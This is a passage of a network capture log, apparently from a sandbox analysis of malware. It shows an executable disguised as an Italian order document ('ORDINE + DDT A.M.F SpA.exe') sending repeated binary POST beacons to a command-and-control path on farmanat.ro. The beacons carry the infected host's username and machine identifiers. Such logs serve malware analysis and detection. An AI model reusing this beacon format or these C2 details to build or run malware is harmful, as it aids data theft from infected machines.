Nov 25, 2021 10:54:33.644135952 CET	7367	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:32 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
762	192.168.11.20	50610	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:34.080656052 CET	7367	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:34.114842892 CET	7368	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:34.165272951 CET	7368	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
763	192.168.11.20	50611	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:34.588984966 CET	7369	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:34.622477055 CET	7369	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:34.671294928 CET	7369	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:33 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
764	192.168.11.20	50612	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:35.090543985 CET	7370	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:35.124819994 CET	7370	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:35.179450035 CET	7371	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
765	192.168.11.20	50613	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:35.567270041 CET	7371	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:35.601305008 CET	7372	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:35.651150942 CET	7372	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
766	192.168.11.20	50614	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:36.074486971 CET	7373	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:36.107959986 CET	7373	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:36.158060074 CET	7373	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
767	192.168.11.20	50615	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:36.588959932 CET	7374	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:36.623321056 CET	7374	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:36.675076008 CET	7375	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:35 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
768	192.168.11.20	50616	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:37.058855057 CET	7375	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:37.092895031 CET	7375	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:37.142956018 CET	7376	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
769	192.168.11.20	50617	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:37.563383102 CET	7377	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:37.596916914 CET	7377	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:37.645782948 CET	7377	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:36 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
77	192.168.11.20	49914	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:49.359585047 CET	6422	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:49.393876076 CET	6422	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:49.444181919 CET	6423	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:48 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
770	192.168.11.20	50618	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:38.018762112 CET	7378	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:38.053430080 CET	7378	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:38.104346037 CET	7379	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
771	192.168.11.20	50619	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:38.499059916 CET	7379	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:38.532474995 CET	7379	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:38.581376076 CET	7380	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:37 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
772	192.168.11.20	50620	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:39.022864103 CET	7381	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:39.056458950 CET	7381	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:39.106671095 CET	7381	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
773	192.168.11.20	50621	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:39.521845102 CET	7382	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:39.556061983 CET	7382	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:39.606010914 CET	7383	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:38 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
774	192.168.11.20	50622	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:40.029449940 CET	7383	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:40.063529968 CET	7383	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:40.114411116 CET	7384	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
775	192.168.11.20	50623	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:40.556828022 CET	7385	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:40.591095924 CET	7385	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:40.643548012 CET	7385	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:39 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
776	192.168.11.20	50624	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:41.063492060 CET	7386	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:41.097805023 CET	7386	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:41.148307085 CET	7386	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
777	192.168.11.20	50625	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:41.563963890 CET	7387	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:41.597642899 CET	7387	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:41.646722078 CET	7388	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:40 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
778	192.168.11.20	50626	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:42.044572115 CET	7389	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:42.079153061 CET	7389	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:42.130131006 CET	7389	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
779	192.168.11.20	50627	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:54:42.547775984 CET	7390	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:54:42.581515074 CET	7390	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:54:42.630259991 CET	7390	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:54:41 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
78	192.168.11.20	49915	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
Nov 25, 2021 10:48:49.936381102 CET	6423	OUT	POST /arman30/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: farmanat.ro Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: F45E6F10 Content-Length: 151 Connection: close
Nov 25, 2021 10:48:49.969984055 CET	6423	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 41 00 72 00 74 00 68 00 75 00 72 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 57 00 31 00 30 00 36 00 34 00 5f 00 30 00 33 00 80 07 00 00 38 04 00 Data Ascii: (ckav.ruArthur468325W1064_038028278665D4ACB73EF64D459A
Nov 25, 2021 10:48:50.019953012 CET	6424	IN	HTTP/1.1 404 Not Found Server: nginx Date: Thu, 25 Nov 2021 09:48:49 GMT Content-Type: text/html; charset=UTF-8 Connection: close Vary: Accept-Encoding X-Powered-By: PHP/7.0.33 X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
780	192.168.11.20	50628	176.223.209.128	80	C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe

Timestamp	kBytes transferred	Direction	Data
